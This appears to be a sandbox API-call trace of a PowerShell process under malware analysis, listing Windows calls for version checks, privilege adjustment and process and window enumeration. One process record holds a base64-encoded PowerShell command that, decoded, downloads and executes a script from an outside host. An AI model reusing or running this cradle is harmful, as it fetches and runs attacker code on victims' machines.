	[0918.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8f9190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0920.112] CryptAcquireContextA (in: phProv=0x1c8f7e08, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x1c8f7e08*=0x1b82c5b0) returned 1
	[0925.277] CoTaskMemAlloc (cb=0x104) returned 0x1b883f90
	[0925.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b883f90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.278] CoTaskMemFree (pv=0x1b883f90) 

Thread:
	id = 1501
	os_tid = 0xbf4


Thread:
	id = 1507
	os_tid = 0x1a84


Thread:
	id = 1530
	os_tid = 0x2014

	[0752.252] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0752.256] ResetEvent (hEvent=0x3b0) returned 1
	[0858.655] GetSystemInfo (in: lpSystemInfo=0x1cabdc10 | out: lpSystemInfo=0x1cabdc10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0905.427] CoUninitialize () 

Thread:
	id = 1759
	os_tid = 0x394


Thread:
	id = 1775
	os_tid = 0x1f58


Thread:
	id = 1856
	os_tid = 0x2494

	[0862.414] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0891.541] QueryContextAttributesW (in: phContext=0x28ef2f0, ulAttribute=0x1a, pBuffer=0x28ef470 | out: pBuffer=0x28ef470) returned 0x0
	[0905.429] DeleteSecurityContext (phContext=0x28eeac0) returned 0x0
	[0906.749] shutdown (s=0x49c, how=2) returned 0
	[0906.749] setsockopt (s=0x49c, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0906.749] closesocket (s=0x49c) returned 0

Process:
	id = "67"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x25d5e000"
	os_pid = "0xf6c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0x588"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 317
	os_tid = 0xf70

	[0439.219] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0440.585] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0440.585] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0440.585] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0440.585] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0443.281] sprintf_s (in: _DstBuf=0x16f0f8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0443.677] GetVersionExW (in: lpVersionInformation=0x16dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0443.679] GetVersionExW (in: lpVersionInformation=0x16dc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0443.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0443.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0443.689] GetVersionExW (in: lpVersionInformation=0x16d970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0443.689] SetErrorMode (uMode=0x1) returned 0x1
	[0443.690] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dad0 | out: lpFileInformation=0x16dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0443.691] SetErrorMode (uMode=0x1) returned 0x1
	[0443.695] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dd40 | out: lpdwHandle=0x16dd40) returned 0x94c
	[0443.696] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c672a0 | out: lpData=0x2c672a0) returned 1
	[0443.699] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c6733c, puLen=0x16dcb0) returned 1
	[0443.701] lstrlenW (lpString="䅁") returned 1
	[0443.710] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c67418, puLen=0x16dc20) returned 1
	[0443.711] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0443.713] CoTaskMemAlloc (cb=0x2e) returned 0x25f390
	[0443.713] lstrcpyW (in: lpString1=0x25f390, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0443.714] CoTaskMemFree (pv=0x25f390) 
	[0443.714] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c6746c, puLen=0x16dc20) returned 1
	[0443.714] lstrlenW (lpString="System.Management.Automation") returned 28
	[0443.714] CoTaskMemAlloc (cb=0x3c) returned 0x19a010
	[0443.714] lstrcpyW (in: lpString1=0x19a010, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0443.714] CoTaskMemFree (pv=0x19a010) 
	[0443.714] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c674c8, puLen=0x16dc20) returned 1
	[0443.714] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0443.714] CoTaskMemAlloc (cb=0x20) returned 0x25de10
	[0443.714] lstrcpyW (in: lpString1=0x25de10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0443.715] CoTaskMemFree (pv=0x25de10) 
	[0443.715] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c67508, puLen=0x16dc20) returned 1
	[0443.715] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0443.715] CoTaskMemAlloc (cb=0x44) returned 0x19a010
	[0443.715] lstrcpyW (in: lpString1=0x19a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0443.715] CoTaskMemFree (pv=0x19a010) 
	[0443.715] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c67570, puLen=0x16dc20) returned 1
	[0443.715] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0443.715] CoTaskMemAlloc (cb=0x76) returned 0x2016a0
	[0443.715] lstrcpyW (in: lpString1=0x2016a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0443.715] CoTaskMemFree (pv=0x2016a0) 
	[0443.715] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c6760c, puLen=0x16dc20) returned 1
	[0443.715] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0443.715] CoTaskMemAlloc (cb=0x44) returned 0x19a010
	[0443.715] lstrcpyW (in: lpString1=0x19a010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0443.767] CoTaskMemFree (pv=0x19a010) 
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c67670, puLen=0x16dc20) returned 1
	[0443.767] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0443.767] CoTaskMemAlloc (cb=0x58) returned 0x1b9510
	[0443.767] lstrcpyW (in: lpString1=0x1b9510, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0443.767] CoTaskMemFree (pv=0x1b9510) 
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c676ec, puLen=0x16dc20) returned 1
	[0443.767] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0443.767] CoTaskMemAlloc (cb=0x20) returned 0x25de10
	[0443.767] lstrcpyW (in: lpString1=0x25de10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0443.767] CoTaskMemFree (pv=0x25de10) 
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x2c67394, puLen=0x16dc20) returned 1
	[0443.767] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0443.767] CoTaskMemAlloc (cb=0x66) returned 0x1cba10
	[0443.767] lstrcpyW (in: lpString1=0x1cba10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0443.767] CoTaskMemFree (pv=0x1cba10) 
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x0, puLen=0x16dc20) returned 0
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x0, puLen=0x16dc20) returned 0
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dc28, puLen=0x16dc20 | out: lplpBuffer=0x16dc28*=0x0, puLen=0x16dc20) returned 0
	[0443.767] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dbf8, puLen=0x16dbf0 | out: lplpBuffer=0x16dbf8*=0x2c6733c, puLen=0x16dbf0) returned 1
	[0443.769] CoTaskMemAlloc (cb=0x204) returned 0x208100
	[0443.769] VerLanguageNameW (in: wLang=0x0, szLang=0x208100, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0443.770] CoTaskMemFree (pv=0x208100) 
	[0443.770] VerQueryValueW (in: pBlock=0x2c672a0, lpSubBlock="\\", lplpBuffer=0x16dc48, puLen=0x16dc40 | out: lplpBuffer=0x16dc48*=0x2c672c8, puLen=0x16dc40) returned 1
	[0443.776] GetCurrentProcessId () returned 0xf6c
	[0443.785] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cb70 | out: lpLuid=0x16cb70*(LowPart=0x14, HighPart=0)) returned 1
	[0443.788] GetCurrentProcess () returned 0xffffffffffffffff
	[0443.788] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cb90 | out: TokenHandle=0x16cb90*=0x2fc) returned 1
	[0443.789] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2c6ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0443.791] CloseHandle (hObject=0x2fc) returned 1
	[0443.796] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf6c) returned 0x2fc
	[0443.805] EnumProcessModules (in: hProcess=0x2fc, lphModule=0x2c6ab80, cb=0x200, lpcbNeeded=0x16dba8 | out: lphModule=0x2c6ab80, lpcbNeeded=0x16dba8) returned 1
	[0443.882] GetModuleInformation (in: hProcess=0x2fc, hModule=0x13f370000, lpmodinfo=0x2c6adf0, cb=0x18 | out: lpmodinfo=0x2c6adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0443.883] CoTaskMemAlloc (cb=0x804) returned 0x266080
	[0443.883] GetModuleBaseNameW (in: hProcess=0x2fc, hModule=0x13f370000, lpBaseName=0x266080, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0443.884] CoTaskMemFree (pv=0x266080) 
	[0443.884] CoTaskMemAlloc (cb=0x804) returned 0x266080
	[0443.885] GetModuleFileNameExW (in: hProcess=0x2fc, hModule=0x13f370000, lpFilename=0x266080, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0443.885] CoTaskMemFree (pv=0x266080) 
	[0443.885] CloseHandle (hObject=0x2fc) returned 1
	[0443.893] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf6c) returned 0x2fc
	[0443.894] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x16dcd8 | out: lpExitCode=0x16dcd8*=0x103) returned 1
	[0443.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c6b088, Length=0x20000, ResultLength=0x16dca0 | out: SystemInformation=0x12c6b088, ResultLength=0x16dca0*=0x29f18) returned 0xc0000004
	[0443.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c8b0b8, Length=0x2c718, ResultLength=0x16dca0 | out: SystemInformation=0x12c8b0b8, ResultLength=0x16dca0*=0x29f18) returned 0x0
	[0444.030] EnumWindows (lpEnumFunc=0x2a866ac, lParam=0x0) returned 1
	[0444.404] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0444.445] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x558
	[0444.448] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0444.497] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0444.588] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0444.683] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x538
	[0444.761] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0444.853] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x778
	[0445.149] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x778
	[0445.370] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0445.625] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0445.804] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0445.805] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0445.868] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0446.040] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0446.226] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0446.319] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0446.398] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x460
	[0446.538] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0446.741] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.021] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1520
	[0447.021] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x14bc
	[0447.021] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf8c
	[0447.021] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe9c
	[0447.021] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1434
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x14ec
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfcc
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12ac
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1484
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x934
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc0c
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb08
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x948
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1178
	[0447.022] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13e0
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xcd0
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13fc
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdc8
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc18
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc2c
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa1c
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1244
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdb0
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1398
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1358
	[0447.023] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1370
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1340
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x130c
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12c0
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12e4
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1270
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1298
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x120c
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x122c
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11c4
	[0447.024] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11b0
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1188
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1148
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1160
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x10fc
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe34
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xea4
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x514
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe48
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xbc8
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdf8
	[0447.025] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x318
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xcac
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x8bc
